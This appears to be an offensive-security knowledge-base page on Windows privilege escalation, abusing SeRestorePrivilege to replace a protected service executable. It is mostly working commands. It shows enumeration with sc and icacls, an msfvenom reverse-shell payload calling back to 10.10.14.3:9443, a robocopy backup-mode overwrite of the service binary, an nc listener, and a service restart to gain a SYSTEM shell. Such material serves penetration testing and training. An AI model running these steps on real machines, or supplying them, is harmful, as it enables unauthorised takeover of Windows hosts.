Operator On The Wire
← Back to Knowledge Base
OOTW / Chapter II - Local / 04. Windows / 02. Privilege Escalation / Privileges / SeRestorePrivilege

Protected Service Binary Replacement

Protected service binary replacement uses SeRestorePrivilege to write over a service executable that normal ACLs would protect.

The primitive is restore-based file write into a privileged execution path. If the service runs as LocalSystem, the next service start can execute the replacement binary as SYSTEM.

When enumerating protected service binary replacement opportunities, try to identify:

  • SeRestorePrivilege in the current token
  • Service binary path
  • Service account context
  • Service restart ability
  • Original binary backup path
  • Whether backup-mode copy writes into the protected directory

Enumeration

Inspect the service:

sc qc <ServiceName>

Check file owner and ACL:

dir /q "C:\Path\To\Service.exe"
icacls "C:\Path\To\Service.exe"

Interesting findings include:

  • Service runs as LocalSystem
  • Normal write access is blocked
  • Restore semantics can write the file
  • Service can be restarted or will restart on reboot

Once the target and trigger are confirmed, stage a service-compatible payload.

Exploit

  1. Preserve the original binary if the current context can read it. If not, record the path, service configuration, and file metadata before continuing.
copy "C:\Path\To\Service.exe" "C:\Users\Public\Service.exe.bak"
  1. Generate a service-compatible payload.
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.3 LPORT=9443 -f exe-service -o Service.exe
  1. Stage it in a writable directory.
mkdir C:\Users\Public\restore
copy Service.exe C:\Users\Public\restore\Service.exe
  1. Use Robocopy in backup mode to restore into the protected location:
robocopy /B C:\Users\Public\restore "C:\Path\To" Service.exe
  1. Start a listener.
nc -lnvp 9443
  1. Restart the service.
sc stop <ServiceName>
sc start <ServiceName>
  1. Verify the resulting context.
whoami
whoami /priv